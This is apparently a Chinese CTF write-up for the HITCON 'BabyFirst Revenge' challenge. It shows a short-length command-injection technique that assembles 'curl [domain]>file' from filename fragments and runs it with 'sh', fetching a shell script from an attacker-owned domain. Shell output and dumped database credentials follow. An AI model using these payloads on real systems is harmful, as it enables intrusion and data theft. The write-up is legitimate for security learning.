Do you remember BabyFirst from HITCON CTF 2015?
This is the harder version!
http://52.199.204.34/
image.png
这种题还是直接说怎么做吧
已知的有两种方法 :
ls -t>[FILENAME]
膜 @zblee 大佬
curl [DOMAIN]>[FILENAME]
其中思路二思路来源于 : @rebirth , 膜大佬
解法一 :
参考文章 :
https://www.leavesongs.com/SHARE/some-tricks-from-my-secret-group.html
给出 Exploit
https://gist.github.com/WangYihang/281fda47bbf7c74fd4e0e34bb5c45454
解法二 :
http://52.199.204.34/?cmd=>cur\
http://52.199.204.34/?cmd=>l\ \
http://52.199.204.34/?cmd=>vvv\
http://52.199.204.34/?cmd=>xx\
http://52.199.204.34/?cmd=>x.x\
http://52.199.204.34/?cmd=>y\
http://52.199.204.34/?cmd=>z\>\
http://52.199.204.34/?cmd=>Z
http://52.199.204.34/?cmd=sh Z
这种方法的限制在于域名 , 需要购买一个符合特定字母顺序的域名
image.png
购买之后添加A记录 , 开启 WEB 服务 , 主页内容为要执行的 shell 脚本即可
拿到 shell 以后的操作
[sniper]=>cat /home/fl4444g/*
[-] Unsupported function!
[+] Executing command on target server...
[+] Result :
Flag is in the MySQL database
fl4444g / SugZXUtgeJ52_Bvr
mysqldump: [Warning] Using a password on the command line interface can be insecure.
mysqldump: Got error: 1044: Access denied for user 'fl4444g'@'%' to database 'fl4gdb' when using LOCK TABLES
-- MySQL dump 10.13 Distrib 5.7.20, for Linux (x86_64)
--
-- Host: localhost Database:
-- ------------------------------------------------------
-- Server version\t5.7.20-0ubuntu0.16.04.1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `fl4gdb`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `fl4gdb` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `fl4gdb`;
报错了 :
mysqldump: Got error: 1044: Access denied for user 'fl4444g'@'%' to database 'fl4gdb' when using LOCK TABLES
比赛的时候时间比较紧急没有研究为什么 , 直接 google 拿到解决方案之后就去看别的题了
解决方案 : https://michaelrigart.be/mysqldump-1044-access-denied-using-lock-tables/
$ mysqldump --single-transaction -u user -p DBNAME > backup.sql
参考文档 : https://dev.mysql.com/doc/refman/5.7/en/mysqldump.html
image.png
网友评论